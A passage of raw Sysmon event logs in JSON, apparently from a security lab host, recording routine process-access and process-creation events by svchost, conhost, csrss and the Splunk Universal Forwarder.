{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3892,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3893,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3894,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3895,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.778\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00102DAB0500}\r\nTargetProcessId: 4912\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.778","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00102DAB0500}","TargetProcessId":"4912","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3896,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.001\r\nProcessGuid: {E2A3D6B1-1107-5F25-0000-0010DCAD0500}\r\nProcessId: 4880\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.001","ProcessGuid":"{E2A3D6B1-1107-5F25-0000-0010DCAD0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3897,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-0010DCAD0500}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.997","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-0010DCAD0500}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3898,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-0010DCAD0500}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.997","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-0010DCAD0500}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3899,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3900,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 